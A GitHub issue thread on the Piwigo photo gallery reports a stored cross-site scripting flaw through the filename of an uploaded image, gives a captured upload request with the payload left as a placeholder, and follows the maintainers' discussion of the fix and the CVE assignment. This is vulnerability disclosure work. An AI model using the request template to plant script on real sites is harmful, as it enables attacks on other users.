Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross Site Scripting in image upload. #600

Closed
boogyman2 opened this issue Jan 4, 2017 · 13 comments
Closed

Cross Site Scripting in image upload. #600

boogyman2 opened this issue Jan 4, 2017 · 13 comments

Comments

@boogyman2
Copy link

Latest Version of piwigo is vulnerable to cross site scripting vulnerability in the image upload function,
The filename of image can be crafted with malicious payload,which in turn executes while viewing the image.


HTTP REQUEST:

POST /piwigo2/piwigo2/ws.php?method=pwg.images.upload&format=json HTTP/1.1
Host: x.x.x.x:xxxx
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://x.x.x.x:xxxx/piwigo2/piwigo2/admin.php?page=photos_add
Content-Length: 437474
Content-Type: multipart/form-data; boundary=---------------------------2133695097524014491600710750
Cookie: pwg_id=5bcim9rvd29i0grbe3qqg4qlk4; PHPSESSID=8e7766b7fc68cc81ee8cb8858dba1b1e; cid=1; wordpress_logged_in_8812ad623e46a1e5ebc36bb4a144d4be=admin%7C1484115709%7CSYNChB5ZsITQYFlPiW5bspgix97gGEwr05932gvtGtp%7Cda8b8a3479779d07c9d1759a52b8e52a7168da7170b66a093ff5ea93a09ec453
Connection: close

-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="name"

test
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="chunk"

0
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="chunks"

1
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="category"

1
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="level"

0
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="pwg_token"

d0cc011709eb9b873188071ab872ebe7
-----------------------------2133695097524014491600710750
Content-Disposition: form-data; name="file"; filename="payloadhere.png"
Content-Type: image/png

Malicious script can be passed in the payloadhere section

@plegall
Copy link
Member

plegall commented Jan 4, 2017

Hi @boogyman2 can you please send me an email with more details? "plg" /at/ "piwigo.org"

@flop25
Copy link
Member

flop25 commented Jan 4, 2017

Hello
I'm the one with the lowest skill here ; so you need to be
1- to be logged as admin
2- to send a picture through an home made POST request just like the one at admin.php?page=photos_add
3- but I don't get the final step

@boogyman2
Copy link
Author

boogyman2 commented Jan 5, 2017

Hi @plegall yea sure,I'll put up a mail.
@plegall Mail sent,with details.Check it out.

@flop25
Copy link
Member

flop25 commented Jan 12, 2017

up?

@boogyman2
Copy link
Author

Hi, @flop25 No Response from @plegall yet, i had sent him a an email explaining the vulnerability.

@boogyman2
Copy link
Author

you up ? @plegall

@plegall
Copy link
Member

plegall commented Jan 27, 2017

I admit I don't really like to modify the original filename.

If you use the web upload form, you execute the javascript in file name, but it is not "stored", so it's not a real problem.

plegall added a commit that referenced this issue Jan 27, 2017
@plegall plegall self-assigned this Jan 27, 2017
@plegall plegall added this to the 2.8.6 milestone Jan 27, 2017
@modus75
Copy link
Contributor

modus75 commented Jan 27, 2017 via email

@boogyman2
Copy link
Author

@plegall the xss is stored one..A victim viewing the image with payload itself is necessary to infect him/her. What if an attacker uplaods the crafted image and sends victim the link. Suggestion by @modus75 is good one to consider.

@plegall
Copy link
Member

plegall commented Jan 27, 2017

"<" is valid in filename on Linux :-/ One thing really nice on the upload form, compared to FTP synchronization, is that you have no constraint on filename.

@boogyman2 The current solution, using htmlentities before registering in database, prevents from stored XSS.

@plegall plegall reopened this Jan 27, 2017
@boogyman2
Copy link
Author

@plegall okey pleg,am not much of a development guy,so i'll leave choice of choosing the better solution to you :) . Can you grab me a CVE for this?

@plegall
Copy link
Member

plegall commented Jan 27, 2017

Usually, the reporter gives us the CVE, not the opposite :-)

@boogyman2
Copy link
Author

boogyman2 commented Jan 30, 2017

Use the CVE Id , CVE-2017-5608

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants